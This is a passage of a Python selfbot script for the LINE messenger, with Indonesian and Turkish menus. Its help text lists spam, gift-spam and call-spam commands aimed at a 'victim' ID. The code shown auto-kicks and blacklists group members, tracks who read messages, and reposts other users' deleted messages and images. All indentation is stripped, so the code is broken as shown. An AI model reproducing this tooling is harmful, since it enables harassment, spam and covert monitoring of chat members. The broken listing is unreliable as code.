aditmadzs.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
aditmadzs.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def siderMembers(to, mid):
try:
arrData = ""
textx = "Total Sider User「{}」\nHaii ".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention+wait["mention"]
if no < len(mid):
no += 1
textx += "%i. " % (num)
num=(num+1)
else:
try:
no = "\n┗━━[ {} ]".format(str(aditmadzs.getGroup(to).name))
except:
no = "\n┗━━[ Success ]"
aditmadzs.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
aditmadzs.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def welcomeMembers(to, mid):
try:
arrData = ""
textx = "Total Member Masuk「{}」\nHaii ".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
ginfo = aditmadzs.getGroup(to)
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention+wait["welcome"]+"\nDi group "+str(ginfo.name)
if no < len(mid):
no += 1
textx += "%i " % (num)
num=(num+1)
else:
try:
no = "\n┗━━[ {} ]".format(str(aditmadzs.getGroup(to).name))
except:
no = "\n┗━━[ Success ]"
aditmadzs.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
aditmadzs.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def leaveMembers(to, mid):
try:
arrData = ""
textx = "Total Member Keluar「{}」\nByee ".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
ginfo = aditmadzs.getGroup(to)
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention+wait["leave"]+"\nDari group "+str(ginfo.name)
if no < len(mid):
no += 1
textx += "%i " % (num)
num=(num+1)
else:
try:
no = "\n┗━━[ {} ]".format(str(aditmadzs.getGroup(to).name))
except:
no = "\n┗━━[ Success ]"
aditmadzs.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
aditmadzs.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention(to, mid, firstmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x \n"
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
today = datetime.today()
future = datetime(2018,3,1)
hari = (str(future - today))
comma = hari.find(",")
hari = hari[:comma]
teman = aditmadzs.getAllContactIds()
gid = aditmadzs.getGroupIdsJoined()
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
eltime = time.time() - mulai
bot = runtime(eltime)
text += mention+"◐ Jam : "+datetime.strftime(timeNow,'%H:%M:%S')+" Wib\n🐚 Group : "+str(len(gid))+"\n🐚 Teman : "+str(len(teman))+"\n🐚 Tanggal : "+datetime.strftime(timeNow,'%Y-%m-%d')+"\n🐚 Runtime : \n • "+bot
aditmadzs.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
aditmadzs.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def command(text):
pesan = text.lower()
if pesan.startswith(Setmain["keyCommand"]):
cmd = pesan.replace(Setmain["keyCommand"],"")
else:
cmd = "command"
return cmd
def help():
key = Setmain["keyCommand"]
key = key.title()
helpMessage = "╔════════════════════╗" + "\n" + \
" ◄]·✪SEAL TEAM✪·[►" + "\n" + \
"╚════════════════════╝" + "\n" + \
"╔════════════════════╗" + "\n" + \
" ◄]·✪·MENU·✪·[►" + "\n" + \
"╠════════════════════╝" + "\n" + \
"╠❂➣ " + key + "Yardım\n" + \
"╠❂➣ " + key + "Help bot\n" + \
"╠❂➣ " + key + "Translate\n" + \
"╠❂➣ " + key + "Meme\n" + \
"╠❂➣ " + key + "Me\n" + \
"╠❂➣ " + key + "Mymid\n" + \
"╠❂➣ " + key + "Mid「@」\n" + \
"╠❂➣ " + key + "Info 「@」\n" + \
"╠❂➣ " + key + "Kick1 「@」\n" + \
"╠❂➣ " + key + "Mybot\n" + \
"╠❂➣ " + key + "Status\n" + \
"╠❂➣ " + key + "Status translate\n" + \
"╠❂➣ " + key + "About\n" + \
"╠❂➣ " + key + "Restart\n" + \
"╠❂➣ " + key + "Runtime\n" + \
"╠❂➣ " + key + "Creator\n" + \
"╠❂➣ " + key + "Respon\n" + \
"╠❂➣ " + key + "Speed/Sp\n" + \
"╠❂➣ " + key + "Sprespon\n" + \
"╠❂➣ " + key + "Mention\n" + \
"╠❂➣ " + key + "join dit\n" + \
"╠❂➣ " + key + "Assist join\n" + \
"╠❂➣ " + key + "Ginfo\n" + \
"╠❂➣ " + key + "Open\n" + \
"╠❂➣ " + key + "Close\n" + \
"╠❂➣ " + key + "Url grup\n" + \
"╠❂➣ " + key + "Reject\n" + \
"╠❂➣ " + key + "Gruplist\n" + \
"╠❂➣ " + key + "Infogrup「angka」\n" + \
"╠❂➣ " + key + "Infomem「angka」\n" + \
"╠❂➣ " + key + "Lurking「on/off」\n" + \
"╠❂➣ " + key + "Lurkers\n" + \
"╠❂➣ " + key + "Sider「on/off」\n" + \
"╠❂➣ " + key + "Updatefoto\n" + \
"╠❂➣ " + key + "Updategrup\n" + \
"╠❂➣ " + key + "Updatebot\n" + \
"╠❂➣ " + key + "Broadcast:「Text」\n" + \
"╠❂➣ " + key + "Setkey「New Key」\n" + \
"╠❂➣ " + key + "Mykey\n" + \
"╠❂➣ " + key + "Resetkey\n" + \
"╠════════════════════╗" + "\n" + \
" ◄]·✪·Eğlence·✪·[►" + "\n" + \
"╠════════════════════╝" + "\n" + \
"╠❂➣ " + key + "Musik:「Judul Lagu」\n" + \
"╠❂➣ " + key + "Musik2:「Judul Lagu」\n" + \
"╠❂➣ " + key + "Playlist「Nama Penyanyi」\n" + \
"╠❂➣ " + key + "Ytmp3:「Judul Lagu」\n" + \
"╠❂➣ " + key + "Ytmp4:「Judul Video\n" + \
"╠❂➣ " + key + "Meme@Nama@Teks1@Teks2\n" + \
"╠❂➣ " + key + "1cak\n" + \
"╠❂➣ " + key + "Profilesmule:「ID Smule」\n" + \
"╠❂➣ " + key + "Randomnumber:「Nmor-Nmor」\n" + \
"╠❂➣ " + key + "Gimage:「Keyword」\n" + \
"╠❂➣ " + key + "Img food:「Nama Makanan」\n" + \
"╠❂➣ " + key + "Cekig:「ID IG」\n" + \
"╠❂➣ " + key + "Profileig:「Nama IG」\n" + \
"╠❂➣ " + key + "Cekdate:「tgl-bln-thn」\n" + \
"╠❂➣ " + key + "Spamtag:「jumlahnya」\n" + \
"╠❂➣ " + key + "Spamtag「@」\n" + \
"╠❂➣ " + key + "Spamcall:「jumlahnya」\n" + \
"╠❂➣ " + key + "Spamcall\n" + \
"╠════════════════════╗" + "\n" + \
" ◄]·✪·KORUMA·✪·[►" + "\n" + \
"╠════════════════════╝" + "\n" + \
"╠❂➣ " + key + "Notag「on/off」\n" + \
"╠❂➣ " + key + "Allpro「on/off」\n" + \
"╠❂➣ " + key + "Protecturl「on/off」\n" + \
"╠❂➣ " + key + "Protectjoin「on/off」\n" + \
"╠❂➣ " + key + "Protectkick「on/off」\n" + \
"╠❂➣ " + key + "Protectcancel「on/off」\n" + \
"╠❂➣ " + key + "Protectinvite「on/off」\n" + \
"╠════════════════════╗" + "\n" + \
" ◄]·✪·AYARLAR·✪·[►" + "\n" + \
"╠════════════════════╝" + "\n" + \
"╠❂➣ " + key + "Unsend「on/off」\n" + \
"╠❂➣ " + key + "Jointicket「on/off」\n" + \
"╠❂➣ " + key + "Sticker「on/off」\n" + \
"╠❂➣ " + key + "Respon「on/off」\n" + \
"╠❂➣ " + key + "Respongift「on/off」\n" + \
"╠❂➣ " + key + "Contact「on/off」\n" + \
"╠❂➣ " + key + "Autojoin「on/off」\n" + \
"╠❂➣ " + key + "Autoadd「on/off」\n" + \
"╠❂➣ " + key + "Hoş Geldiniz「on/off」\n" + \
"╠❂➣ " + key + "Simi「on/off」\n" + \
"╠❂➣ " + key + "Autoleave「on/off」\n" + \
"╠══════════════════════════════╗" + "\n" + \
" ◄]·✪·Admin·✪·[►" + "\n" + \
"╠══════════════════════════════╝" + "\n" + \
"╠❂➣ " + key + "Admin:on\n" + \
"╠❂➣ " + key + "Admin:delete\n" + \
"╠❂➣ " + key + "Staff:on\n" + \
"╠❂➣ " + key + "Staff:delete\n" + \
"╠❂➣ " + key + "Bot:on\n" + \
"╠❂➣ " + key + "Bot:delete\n" + \
"╠❂➣ " + key + "Adminadd「@」\n" + \
"╠❂➣ " + key + "Admindell「@」\n" + \
"╠❂➣ " + key + "Staffadd「@」\n" + \
"╠❂➣ " + key + "Staffdell「@」\n" + \
"╠❂➣ " + key + "Botadd「@」\n" + \
"╠❂➣ " + key + "Botdell「@」\n" + \
"╠❂➣ " + key + "Refresh\n" + \
"╠❂➣ " + key + "Listbot\n" + \
"╠❂➣ " + key + "Listadmin\n" + \
"╠❂➣ " + key + "Listprotect\n" + \
"╠❂➣ Ketik「 Refresh 」Jika Sudah\n╠❂➣ Menggunakan Command Diatas...\n" + \
"╠════════════════════╗" + "\n" + \
" ◄]·✪ALBAYRAK✪·[►" + "\n" + \
"╠════════════════════╝" + "\n" + \
"╠════════════════════╗" + "\n" + \
"◄]·✪line.me/ti/p/~adit_cmct✪·[►" + "\n" + \
"╚════════════════════╝"
return helpMessage
def helpbot():
key = Setmain["keyCommand"]
key = key.title()
helpMessage1 = "╔════════════════════╗" + "\n" + \
" 🍁🍁🍁 SEAL TEAM 🍁🍁🍁" + "\n" + \
"╚════════════════════╝" + "\n" + \
"╔════════════════════╗" + "\n" + \
" ◄]·✪·BOT·✪·[►" + "\n" + \
"╠════════════════════╝" + "\n" + \
"╠❂➣ " + key + "Mytoken\n" + \
"╠❂➣ " + key + "Cek sider\n" + \
"╠❂➣ " + key + "Cek spam\n" + \
"╠❂➣ " + key + "Cek pesan\n" + \
"╠❂➣ " + key + "Cek respon\n" + \
"╠❂➣ " + key + "Cek welcome\n" + \
"╠❂➣ " + key + "Cek leave\n" + \
"╠❂➣ " + key + "Set sider:「Text」\n" + \
"╠❂➣ " + key + "Set spam:「Text」\n" + \
"╠❂➣ " + key + "Set pesan:「Text」\n" + \
"╠❂➣ " + key + "Set respon:「Text」\n" + \
"╠❂➣ " + key + "Set welcome:「Text」\n" + \
"╠❂➣ " + key + "Set leave:「Text」\n" + \
"╠❂➣ " + key + "Myname:「Nama」\n" + \
"╠❂➣ " + key + "Bot1name:「Nama」\n" + \
"╠❂➣ " + key + "Bot2name:「Nama」\n" + \
"╠❂➣ " + key + "Bot1up「Kirim fotonya」\n" + \
"╠❂➣ " + key + "Bot2up「Kirim fotonya」\n" + \
"╠❂➣ " + key + "Gift:「Mid korban」「Jumlah」\n" + \
"╠❂➣ " + key + "Spam:「Mid korban」「Jumlah」\n" + \
"╠❂➣ " + key + "Spamtag:「jumlahnya」\n" + \
"╠❂➣ " + key + "Spamtag「@」\n" + \
"╠❂➣ " + key + "Spamcall:「jumlahnya」\n" + \
"╠❂➣ " + key + "Spamcall\n" + \
"╠❂➣ " + key + "Updatefoto\n" + \
"╠❂➣ " + key + "Updategrup\n" + \
"╠❂➣ " + key + "Updatebot\n" + \
"╠❂➣ " + key + "Broadcast:「Text」\n" + \
"╠❂➣ " + key + "Setkey「New Key」\n" + \
"╠❂➣ " + key + "Mykey\n" + \
"╠❂➣ " + key + "Resetkey\n" + \
"╠❂➣ " + key + "Self「on/off」\n" + \
"╠❂➣ " + key + "Hapus chat\n" + \
"╠❂➣ " + key + "Remove chat\n" + \
"╠❂➣ " + key + "Leave:「Namagrup」\n" + \
"╠════════════════════╗" + "\n" + \
" ◄]·✪·Kara liste·✪·[►" + "\n" + \
"╠════════════════════╝" + "\n" + \
"╠❂➣ " + key + "Blc\n" + \
"╠❂➣ " + key + "Ban:on\n" + \
"╠❂➣ " + key + "Unban:on\n" + \
"╠❂➣ " + key + "Ban「@」\n" + \
"╠❂➣ " + key + "Unban「@」\n" + \
"╠❂➣ " + key + "Talkban「@」\n" + \
"╠❂➣ " + key + "Untalkban「@」\n" + \
"╠❂➣ " + key + "Talkban:on\n" + \
"╠❂➣ " + key + "Untalkban:on\n" + \
"╠❂➣ " + key + "Banlist\n" + \
"╠❂➣ " + key + "Talkbanlist\n" + \
"╠❂➣ " + key + "Clearban\n" + \
"╠❂➣ " + key + "Refresh\n" + \
"╠════════════════════╗" + "\n" + \
" ◄]·✪ALBAYRAK✪·[►" + "\n" + \
"╠════════════════════╝" + "\n" + \
"╠════════════════════╗" + "\n" + \
"◄]·✪line.me/ti/p/~adit_cmct✪·[►" + "\n" + \
"╚════════════════════╝"
return helpMessage1
def infomeme():
helpMessage2 = """
╔══════════════════════════════╗
◄]·✪SEAL TEAM✪·[►
╚══════════════════════════════╝
╔══════════════════════════════╗
◄]·✪·List Meme·✪·[►
╠══════════════════════════════╝
╠❂➣ Buzz
╠❂➣ Spongebob
╠❂➣ Patrick
╠❂➣ Doge
╠❂➣ Joker
╠❂➣ Xzibit
╠❂➣ You_tried
╠❂➣ cb
╠❂➣ blb
╠❂➣ wonka
╠❂➣ keanu
╠❂➣ cryingfloor
╠❂➣ disastergirl
╠❂➣ facepalm
╠❂➣ fwp
╠❂➣ grumpycat
╠❂➣ captain
╠❂➣ mmm
╠❂➣ rollsafe
╠❂➣ sad-obama
╠❂➣ sad-clinton
╠❂➣ aag
╠❂➣ sarcasticbear
╠❂➣ sk
╠❂➣ sparta
╠❂➣ sad
╠❂➣ contoh:
╠❂➣ Meme@buzz@lu tau?@gatau
╠══════════════════════════════╗
◄]·✪SEAL TEAM✪·[►
╠══════════════════════════════╝
╠══════════════════════════════╗
◄]·✪ALBAYRAK ✪·[►
╚══════════════════════════════╝
"""
return helpMessage2
def translate():
helpTranslate = "╔══════════════════════════════╗" + "\n" + \
" 🍁🍁🍁 SEAL TEAM 🍁🍁🍁" + "\n" + \
"╚══════════════════════════════╝" + "\n" + \
"╔══════════════════════════════╗" + "\n" + \
" ◄]·✪·ALBAYRAK·✪·[►" + "\n" + \
"╠══════════════════════════════╝" + "\n" + \
"╠❂➣ Autotrans「en-on/en-off」\n" + \
"╠❂➣ Autotrans「id-on/id-off」\n" + \
"╠❂➣ Autotrans「th-on/th-off」\n" + \
"╠❂➣ Autotrans「tw-on/tw-off」\n" + \
"╠❂➣ Autotrans「ar-on/ar-off」\n" + \
"╠❂➣ af : afrikaans" + "\n" + \
"╠❂➣ sq : albanian" + "\n" + \
"╠❂➣ am : amharic" + "\n" + \
"╠❂➣ ar : arabic" + "\n" + \
"╠❂➣ hy : armenian" + "\n" + \
"╠❂➣ az : azerbaijani" + "\n" + \
"╠❂➣ eu : basque" + "\n" + \
"╠❂➣ be : belarusian" + "\n" + \
"╠❂➣ bn : bengali" + "\n" + \
"╠❂➣ bs : bosnian" + "\n" + \
"╠❂➣ bg : bulgarian" + "\n" + \
"╠❂➣ ca : catalan" + "\n" + \
"╠❂➣ ceb : cebuano" + "\n" + \
"╠❂➣ ny : chichewa" + "\n" + \
"╠❂➣ zh-cn : chinese (simplified)" + "\n" + \
"╠❂➣ zh-tw : chinese (traditional)" + "\n" + \
"╠❂➣ co : corsican" + "\n" + \
"╠❂➣ hr : croatian" + "\n" + \
"╠❂➣ cs : czech" + "\n" + \
"╠❂➣ da : danish" + "\n" + \
"╠❂➣ nl : dutch" + "\n" + \
"╠❂➣ en : english" + "\n" + \
"╠❂➣ eo : esperanto" + "\n" + \
"╠❂➣ et : estonian" + "\n" + \
"╠❂➣ tl : filipino" + "\n" + \
"╠❂➣ fi : finnish" + "\n" + \
"╠❂➣ fr : french" + "\n" + \
"╠❂➣ fy : frisian" + "\n" + \
"╠❂➣ gl : galician" + "\n" + \
"╠❂➣ ka : georgian" + "\n" + \
"╠❂➣ de : german" + "\n" + \
"╠❂➣ el : greek" + "\n" + \
"╠❂➣ gu : gujarati" + "\n" + \
"╠❂➣ ht : haitian creole" + "\n" + \
"╠❂➣ ha : hausa" + "\n" + \
"╠❂➣ haw : hawaiian" + "\n" + \
"╠❂➣ iw : hebrew" + "\n" + \
"╠❂➣ hi : hindi" + "\n" + \
"╠❂➣ hmn : hmong" + "\n" + \
"╠❂➣ hu : hungarian" + "\n" + \
"╠❂➣ is : icelandic" + "\n" + \
"╠❂➣ ig : igbo" + "\n" + \
"╠❂➣ id : indonesian" + "\n" + \
"╠❂➣ ga : irish" + "\n" + \
"╠❂➣ it : italian" + "\n" + \
"╠❂➣ ja : japanese" + "\n" + \
"╠❂➣ jw : javanese" + "\n" + \
"╠❂➣ kn : kannada" + "\n" + \
"╠❂➣ kk : kazakh" + "\n" + \
"╠❂➣ km : khmer" + "\n" + \
"╠❂➣ ko : korean" + "\n" + \
"╠❂➣ ku : kurdish (kurmanji)" + "\n" + \
"╠❂➣ ky : kyrgyz" + "\n" + \
"╠❂➣ lo : lao" + "\n" + \
"╠❂➣ la : latin" + "\n" + \
"╠❂➣ lv : latvian" + "\n" + \
"╠❂➣ lt : lithuanian" + "\n" + \
"╠❂➣ lb : luxembourgish" + "\n" + \
"╠❂➣ mk : macedonian" + "\n" + \
"╠❂➣ mg : malagasy" + "\n" + \
"╠❂➣ ms : malay" + "\n" + \
"╠❂➣ ml : malayalam" + "\n" + \
"╠❂➣ mt : maltese" + "\n" + \
"╠❂➣ mi : maori" + "\n" + \
"╠❂➣ mr : marathi" + "\n" + \
"╠❂➣ mn : mongolian" + "\n" + \
"╠❂➣ my : myanmar (burmese)" + "\n" + \
"╠❂➣ ne : nepali" + "\n" + \
"╠❂➣ no : norwegian" + "\n" + \
"╠❂➣ ps : pashto" + "\n" + \
"╠❂➣ fa : persian" + "\n" + \
"╠❂➣ pl : polish" + "\n" + \
"╠❂➣ pt : portuguese" + "\n" + \
"╠❂➣ pa : punjabi" + "\n" + \
"╠❂➣ ro : romanian" + "\n" + \
"╠❂➣ ru : russian" + "\n" + \
"╠❂➣ sm : samoan" + "\n" + \
"╠❂➣ gd : scots gaelic" + "\n" + \
"╠❂➣ sr : serbian" + "\n" + \
"╠❂➣ st : sesotho" + "\n" + \
"╠❂➣ sn : shona" + "\n" + \
"╠❂➣ sd : sindhi" + "\n" + \
"╠❂➣ si : sinhala" + "\n" + \
"╠❂➣ sk : slovak" + "\n" + \
"╠❂➣ sl : slovenian" + "\n" + \
"╠❂➣ so : somali" + "\n" + \
"╠❂➣ es : spanish" + "\n" + \
"╠❂➣ su : sundanese" + "\n" + \
"╠❂➣ sw : swahili" + "\n" + \
"╠❂➣ sv : swedish" + "\n" + \
"╠❂➣ tg : tajik" + "\n" + \
"╠❂➣ ta : tamil" + "\n" + \
"╠❂➣ te : telugu" + "\n" + \
"╠❂➣ th : thai" + "\n" + \
"╠❂➣ tr : turkish" + "\n" + \
"╠❂➣ uk : ukrainian" + "\n" + \
"╠❂➣ ur : urdu" + "\n" + \
"╠❂➣ uz : uzbek" + "\n" + \
"╠❂➣ vi : vietnamese" + "\n" + \
"╠❂➣ cy : welsh" + "\n" + \
"╠❂➣ xh : xhosa" + "\n" + \
"╠❂➣ yi : yiddish" + "\n" + \
"╠❂➣ yo : yoruba" + "\n" + \
"╠❂➣ zu : zulu" + "\n" + \
"╠❂➣ fil : Filipino" + "\n" + \
"╠❂➣ he : Hebrew" + "\n" + \
"╠══════════════════════════════╗" + "\n" + \
" Contoh: SEAL TEAM" + "\n" + \
"╠══════════════════════════════╝" + "\n" + \
"╠══════════════════════════════╗" + "\n" + \
"◄]·✪ ALBAYRAK ·[►" + "\n" + \
"╚══════════════════════════════╝"
return helpTranslate
def bot(op):
global time
global ast
global groupParam
try:
if op.type == 0:
return
if op.type == 11:
if op.param1 in protectqr:
try:
if aditmadzs.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
aditmadzs.reissueGroupTicket(op.param1)
X = aditmadzs.getGroup(op.param1)
X.preventedJoinByTicket = True
aditmadzs.updateGroup(X)
aditmadzs.sendMessage(op.param1, None, contentMetadata={'mid': op.param2}, contentType=13)
except:
try:
if ki.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
ki.reissueGroupTicket(op.param1)
X = ki.getGroup(op.param1)
X.preventedJoinByTicket = True
ki.updateGroup(X)
aditmadzs.sendMessage(op.param1, None, contentMetadata={'mid': op.param2}, contentType=13)
except:
pass
if op.type == 13:
if mid in op.param3:
if wait["autoLeave"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
aditmadzs.acceptGroupInvitation(op.param1)
ginfo = aditmadzs.getGroup(op.param1)
aditmadzs.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
aditmadzs.leaveGroup(op.param1)
else:
aditmadzs.acceptGroupInvitation(op.param1)
ginfo = aditmadzs.getGroup(op.param1)
aditmadzs.sendMessage(op.param1,"Hai " + str(ginfo.name))
if op.type == 13:
if mid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
aditmadzs.acceptGroupInvitation(op.param1)
ginfo = aditmadzs.getGroup(op.param1)
aditmadzs.sendMessage(op.param1,"Haii, salken yaa ^^")
else:
aditmadzs.acceptGroupInvitation(op.param1)
ginfo = aditmadzs.getGroup(op.param1)
aditmadzs.sendMessage(op.param1,"Haii, salken yaa ^^")
if Amid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
ki.acceptGroupInvitation(op.param1)
ginfo = ki.getGroup(op.param1)
ki.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
ki.leaveGroup(op.param1)
else:
ki.acceptGroupInvitation(op.param1)
ginfo = ki.getGroup(op.param1)
ki.sendMessage(op.param1,"Hai " + str(ginfo.name))
if op.type == 13:
if op.param1 in protectinvite:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
try:
group = aditmadzs.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
random.choice(KAC).cancelGroupInvitation(op.param1,[_mid])
except:
try:
group = ki.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
random.choice(KAC).cancelGroupInvitation(op.param1,[_mid])
except:
pass
if op.type == 15:
if op.param1 in welcome:
if op.param2 in Bots:
pass
ginfo = aditmadzs.getGroup(op.param1)
contact = aditmadzs.getContact(op.param2).picturePath
image = 'http://dl.profile.line.naver.jp'+contact
leaveMembers(op.param1, [op.param2])
aditmadzs.sendImageWithURL(op.param1, image)
if op.type == 17:
if op.param2 in wait["blacklist"]:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
if op.type == 17:
if op.param1 in welcome:
if op.param2 in Bots:
pass
ginfo = aditmadzs.getGroup(op.param1)
contact = aditmadzs.getContact(op.param2)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
welcomeMembers(op.param1, [op.param2])
aditmadzs.sendImageWithURL(op.param1, image)
if op.type == 17:
if op.param1 in protectjoin:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
try:
if op.param3 not in wait["blacklist"]:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
pass
return
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
if (wait["message"] in [" "," ","\n",None]):
pass
else:
aditmadzs.sendMessage(op.param1, wait["message"])
#===========ATMAK============#
if op.type == 19:
if op.param1 in protectkick:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
#===========İptal etmek============#
if op.type == 32:
if op.param1 in protectcancel:
if op.param3 in Bots:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
try:
if op.param3 not in wait["blacklist"]:
ki.findAndAddContactsByMid(op.param1,[Zmid])
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[Zmid])
except:
try:
if op.param3 not in wait["blacklist"]:
aditmadzs.findAndAddContactsByMid(op.param1,[Zmid])
aditmadzs.kickoutFromGroup(op.param1,[op.param2])
aditmadzs.inviteIntoGroup(op.param1,[Zmid])
except:
pass
return
if op.type == 19:
if mid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
ki.inviteIntoGroup(op.param1,[op.param3])
aditmadzs.acceptGroupInvitation(op.param1)
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
G = ki.getGroup(op.param1)
G.preventedJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
aditmadzs.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.kickoutFromGroup(op.param1,[op.param2])
G = ki.getGroup(op.param1)
G.preventedJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
except:
pass
return
if Amid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
aditmadzs.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
aditmadzs.kickoutFromGroup(op.param1,[op.param2])
except:
try:
G = aditmadzs.getGroup(op.param1)
G.preventedJoinByTicket = False
aditmadzs.updateGroup(G)
Ticket = aditmadzs.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
aditmadzs.kickoutFromGroup(op.param1,[op.param2])
G = aditmadzs.getGroup(op.param1)
G.preventedJoinByTicket = True
aditmadzs.updateGroup(G)
Ticket = aditmadzs.reissueGroupTicket(op.param1)
except:
pass
return
if admin in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
ki.findAndAddContactsByMid(op.param1,admin)
ki.inviteIntoGroup(op.param1,admin)
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
aditmadzs.findAndAddContactsByMid(op.param1,admin)
aditmadzs.inviteIntoGroup(op.param1,admin)
aditmadzs.kickoutFromGroup(op.param1,[op.param2])
except:
pass
return
if staff in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
ki.findAndAddContactsByMid(op.param1,staff)
ki.inviteIntoGroup(op.param1,staff)
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
aditmadzs.findAndAddContactsByMid(op.param1,staff)
aditmadzs.inviteIntoGroup(op.param1,staff)
aditmadzs.kickoutFromGroup(op.param1,[op.param2])
except:
pass
return
if op.type == 55:
try:
if op.param1 in Setmain["ADITMADZSreadPoint"]:
if op.param2 in Setmain["ADITMADZSreadMember"][op.param1]:
pass
else:
Setmain["ADITMADZSreadMember"][op.param1][op.param2] = True
else:
pass
except:
pass
if op.type == 55:
if op.param2 in wait["blacklist"]:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
if cctv['cyduk'][op.param1]==True:
if op.param1 in cctv['point']:
Name = aditmadzs.getContact(op.param2).displayName
if Name in cctv['sidermem'][op.param1]:
pass
else:
cctv['sidermem'][op.param1] += "\n~ " + Name
siderMembers(op.param1, [op.param2])
contact = aditmadzs.getContact(op.param2)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
aditmadzs.sendImageWithURL(op.param1, image)
if op.type == 65:
if wait["unsend"] == True:
try:
at = op.param1
msg_id = op.param2
if msg_id in msg_dict:
if msg_dict[msg_id]["from"]:
if msg_dict[msg_id]["text"] == 'Gambarnya dibawah':
ginfo = aditmadzs.getGroup(at)
Aditmadzs = aditmadzs.getContact(msg_dict[msg_id]["from"])
zx = ""
zxc = ""
zx2 = []
xpesan = "「 Gambar Dihapus 」\n• Pengirim : "
ret_ = "• Nama Grup : {}".format(str(ginfo.name))
ret_ += "\n• Waktu Ngirim : {}".format(dt_to_str(cTime_to_datetime(msg_dict[msg_id]["createdTime"])))
ry = str(Aditmadzs.displayName)
pesan = ''
pesan2 = pesan+"@x \n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':Aditmadzs.mid}
zx2.append(zx)
zxc += pesan2
text = xpesan + zxc + ret_ + ""
aditmadzs.sendMessage(at, text, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
aditmadzs.sendImage(at, msg_dict[msg_id]["data"])
else:
ginfo = aditmadzs.getGroup(at)
Aditmadzs = aditmadzs.getContact(msg_dict[msg_id]["from"])
